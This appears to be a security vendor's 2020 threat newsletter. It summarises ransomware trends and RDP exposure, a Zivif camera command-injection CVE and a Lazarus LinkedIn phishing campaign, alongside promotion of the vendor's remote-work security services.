In the first half of 2020, ransomware attacks have become more prevalent and received more attention than ever before. There are a number of different ransomware types out there in the wild, and most sophisticated threat actors have adapted their variants according to their attack plan. Some of them steal additional data and export it to C2 servers while encrypting all the data, others drop additional malware in the network for lateral movement purposes, and more sophisticated groups even offer customer support to support their ransomware. What they all have in common is that they let their victim know very quickly that they are infected and then everyone's life gets a lot harder.
Since most people are working remotely during the current pandemic, it is no surprise that Remote Desktop Protocol (RDP) is the number one attack vector for ransomware these days. RDP was already a popular attack vector in 2019 due to the lack of security and misconfiguration in many of these devices, but the current work from home situation has made it even more popular. A Shodan scan from this week reveals that more than 3.8 million devices with RDP enabled are connected directly to the internet, and darknet sites often sell weak credentials and compromised data to help attackers to gain access to these systems. Researchers report that over 50% of every ransomware attacks was initiated via RDP. Email phishing attacks, a very popular attack vector that has been on the top of the list for a very long time, has moved to the number two spot.
Work from home is the new paradigm that requires employees to complete their work-related tasks through remote internet connections. This new "telework" model provides many benefits to employees, including geographic freedom, the elimination of commuting, and more flexible schedules. When emergencies happen that shift employees out of the office, organizations need solutions that enable business continuity and support employees as they work from alternate locations. The transition to the teleworker model opens users and companies up to myriad security threats including malware, all forms of phishing attacks, and many more. Ashco cyber security solution and services addresses remote worker scenarios with three primary levels of connectivity. If you have technical questions or need assistance, contact us at firstname.lastname@example.org
CVE-2017-17105 indicates an attack attempt to exploit a Remote Command Injection vulnerability in Zivif PR115-204-P-RS Web Camera. The vulnerability is due to insufficient sanitizing of user supplied inputs. A remote attacker may be able to exploit this to execute arbitrary code within the context of the application, via a crafted HTTP request. The affected products are Zivif PR115-204-P-RS V184.108.40.2063 and earlier. The impact can lead to remote attackers gaining control of vulnerable systems.
Lazarus Targets Cryptocurrency Vertical:
The weakest link in the cyberspace is usually the human factor. Most security incidents in corporate environments happen due to human mistakes. To be fair though, phishing and spear-phishing attacks are getting more and more sophisticated, so it's not always easy to spot them immediately. The rise of social media just added additional opportunities to gather information about their victims and use that in their phishing attacks. This is illustrated through an interesting report released by Researchers about the Lazarus group targeting the cryptocurrency vertical. It all starts with administrators at the targeted organizations receiving a phishing document via their personal LinkedIn account. The masqueraded document advertises for a job in a blockchain company (Lazarus targets people with LinkedIn profiles showing these skills). The attached malicious document claims to be protected by the General Data Protection Regulation (GDPR) and asks the user to enable content in Word to access the full document. Once the victims fall for it, the malicious embedded macro code executes and downloads a PowerShell script from a C2 server.
Our Research & Insights:
Whitepaper: Effective Cyber Security Strategies During Covid-19 Pandemic
Whitepaper: The Essential Guide to Security Remote Access
Secure Devops: How to make security integral into your Devops process?
E-Book: Effective Security Strategies for Devops and Application Services
E-Book: How to Build a Next Generation Security Operations Center
Validate your organizations cloud security and compliance posture using our Cloud Security Assessment.